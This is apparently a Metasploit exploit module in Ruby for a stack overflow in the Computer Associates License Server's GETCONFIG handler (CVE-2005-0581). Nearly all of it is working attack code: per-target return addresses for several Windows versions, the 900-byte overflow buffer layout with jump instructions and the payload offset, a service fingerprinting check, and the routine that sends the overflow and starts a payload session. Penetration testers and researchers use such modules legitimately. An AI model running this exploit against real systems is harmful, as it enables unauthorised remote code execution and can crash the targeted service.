GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/license/calicserv_getconfig.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
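class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Stack-based overflow in the Computer Associates License Server network
  # service (TCP/10202 by default): an over-long GETCONFIG request overwrites
  # the stack. Every target supplies three fixed addresses (a 'jmp esi', a
  # writable word and a 'jmp edi') taken from ws2help.dll / the PEB, so there
  # is no automatic targeting and the module is only as reliable as the
  # operator's target choice -- a wrong pick most likely crashes the service
  # instead of returning a session.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Computer Associates License Server GETCONFIG Overflow',
        'Description' => %q{
          This module exploits an vulnerability in the CA License Server
          network service. By sending an excessively long GETCONFIG
          packet the stack may be overwritten.
        },
        'Author' => [
          'hdm', # original msf v2 module
          'aushack', # msf v3 port :)
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0581' ],
          [ 'OSVDB', '14389' ],
          [ 'BID', '12705' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          # 600 bytes of payload land at offset 272 of the 900-byte buffer.
          'Space' => 600,
          # NUL and space are excluded; presumably the server tokenises the
          # request on whitespace and C-strings -- not verified here.
          'BadChars' => "\x00\x20",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # As much as I would like to return back to the DLL or EXE,
          # all of those modules have a leading NULL in the
          # loaded @ address :(
          # name, jmp esi, writable, jmp edi
          # ['Automatic', {} ],
          #
          # aushack - tested OK Windows XP English SP0-1 only 20100214
          ['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
          ['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
          ['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
          ['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
        ],
        'DisclosureDate' => '2005-03-02',
        # Placeholders left by the v3 port: the module has not been rated
        # against the reliability/stability taxonomy. Given the hard-coded
        # return addresses, assume a target mismatch can take the service down.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10202),
      ]
    )
  end

  # Fingerprints the service with a benign, short GETCONFIG request and looks
  # for the OS<...> field in the reply.
  #
  # Returns CheckCode::Detected, not Appears/Vulnerable: the probe only shows
  # that a CA license server answers on RPORT; it cannot tell a patched build
  # from an unpatched one. The socket is closed even if the exchange raises.
  def check
    connect
    begin
      sock.get_once # greeting; not needed for the fingerprint
      sock.put("A0 GETCONFIG SELF 0<EOM>")
      res = sock.get_once || ''
    ensure
      disconnect
    end

    os = res.match(/OS\<([^\>]+)/)
    if os
      vprint_status("CA License Server reports OS: #{os[1]}")
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Sends the overflow and starts the payload handler.
  #
  # A missing GETCONFIG greeting is only reported, not fatal -- run check
  # first if the target's identity is in doubt, because the trigger below
  # will smash the stack regardless.
  def exploit
    connect
    begin
      banner = sock.get_once
      if banner !~ /GETCONFIG/
        print_warning("The server did not return the expected greeting!")
      end

      # Layout of the 900-byte buffer (offsets into buff). Two code paths are
      # covered at once: whichever of esi/edi is live lands in the payload.
      #   142  short jmp +8 over the two addresses that follow
      #   144  'jmp esi' -- esi points into the middle of the string
      #   148  writable address, patched in to avoid an exception before return
      #   194  short jmp +4 over the address that follows
      #   196  'jmp edi' -- edi points to the beginning of the string
      #   272  encoded payload (Space 600, so it ends well inside 900 bytes)
      #   928  SEH handler slot (original note: not useful under XP SP2); this
      #        buffer does not extend that far
      buff = rand_text_alphanumeric(900)
      buff[142, 2] = Rex::Arch::X86.jmp_short(8)
      buff[144, 4] = [target['Rets'][0]].pack('V')
      buff[148, 4] = [target['Rets'][1]].pack('V')
      buff[194, 2] = Rex::Arch::X86.jmp_short(4)
      buff[196, 4] = [target['Rets'][2]].pack('V')
      buff[272, payload.encoded.length] = payload.encoded

      sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
      sock.put(sploit)

      handler
    ensure
      disconnect
    end
  end
end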
=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end